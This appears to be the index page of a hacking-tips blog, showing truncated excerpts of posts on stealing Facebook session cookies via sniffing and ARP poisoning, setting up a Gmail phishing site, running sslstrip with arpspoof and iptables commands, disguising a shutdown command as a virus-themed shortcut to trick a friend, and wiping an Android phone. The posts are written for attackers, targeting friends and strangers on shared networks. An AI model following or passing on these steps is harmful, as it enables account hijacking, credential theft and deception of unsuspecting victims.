Posts

How To Steal Facebook Session Cookies And Hijack An Account?

Image
How To Steal Facebook Session Cookies And Hijack An Account?  An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account. If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account. In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark. Step 1 -  First of all download wireshark from the official website and install it. Step 2 -  Next open up wireshark click on analyze and then click on interfaces. Step 3 -  Next choose the appropriate interface and clic

How To Unlock Password of Android Phone And Tablet

Image
How To Unlock Password of  Android Phone And Tablet: 1.First of all Power Off your device. 2.After this just press Up Volume Key and hold it. 3.Now press the power button and hold it. 4.It will start a secret terminal.  5.You can use home button for go up and down. 6.You can use option DELETE ALL USER DATA. 7.It will take some time, and problem is solved. Warning :- if u use this trick then the data of your mobile will be lost 

Admin Loggin finder

Image
Download Admin login finder

Skype call recorder

Image
Callnote Premium Call Recorder Record your Skype video and audio calls. Easy to use for your Skype video and audio interviews, conferences, podcasts, or family VoIP calls. Evaer - excellent Skype video & audio recorder features: Capture original Skype video and audio data to record with high quality. Support single video call and group video calls. Directly record Skype video calls to your hard disk with side-by-side or separate mode. Record separate MP3 audio file in the video calls is optional. Choose the video compressor by your requirement. Automatic chat reply. Easy to use with friendly UI. goto this url http://shop.skype.com/apps/Call-recording-audio-video/Callnote-Premium-Call-Recorder.html

Shutdown Friend's compute while chating

Image
It can be the coolest thing to do with you friends while chatting. There is no Limitation on the messenger but the messenger should provide the file transfer service to send the following Program. STEP 1) right-click on any folder goto -> New -> Shortcut. STEP 2) Type in shortcut %windir%\system32\shutdown.exe -s -t 120 -c "The 31HA0w Virus Have invaded your Computer. And it is deleting your files"  STEP 3) right-click the shortcut goto -> Properties -> Choose Icon. Now choose any icon of your choice. STEP 4) Compress the file in ZIP and sent it to your friend while chatting and ask him to run it

GMail Phishing Page

Image
In this Tutorial I will show you how to set up Gmail Phishing site, step by step with pictures. Step 1:  The First Step in Making the site is to regester an account at  http://www.000webhost.com/order.php  (if you have account than you can skip first 2 steps) Step 2:  Now Goto your email account that you gave and confirm your account with confirmation link Step 3:  Now Download this  FILE  ( http://www.filesonic.com/file/4165336855/Gmail-Phishing-site.zip  ) . Step 4:  Now Goto  http://members.000webhost.com/  and Log into your account. Step 5:  Now when you are logged into your account click on the  Go to Cpanel   in front of your domain that you had registered, and then Go to  File Manager  under  Files and log into it. .  Step 6:  Now Click on the  Public_html. Step 7:  Now click on the  Upload  button, choose the file under the  Archives  that you have downloaded, to be uploaded. Step 7:  Now any one who visits your site would be taken

SSL Strip on gmail

Image
What is SSL Strip? SSL strip is a software that is used to sniff the data over HTTP and HTTP S. The sniffer read all the data in a network with is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your friend in same wifi network). So here is a tools that can even intercept the data over HTTP and HTTPS. Running sslstrip Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward) Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>) Run sslstrip. (sslstrip.py -l <listenPort>) Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>) That should do it. How do this work? First, arpspoof convinces a host that our MAC address is the router’s MAC addres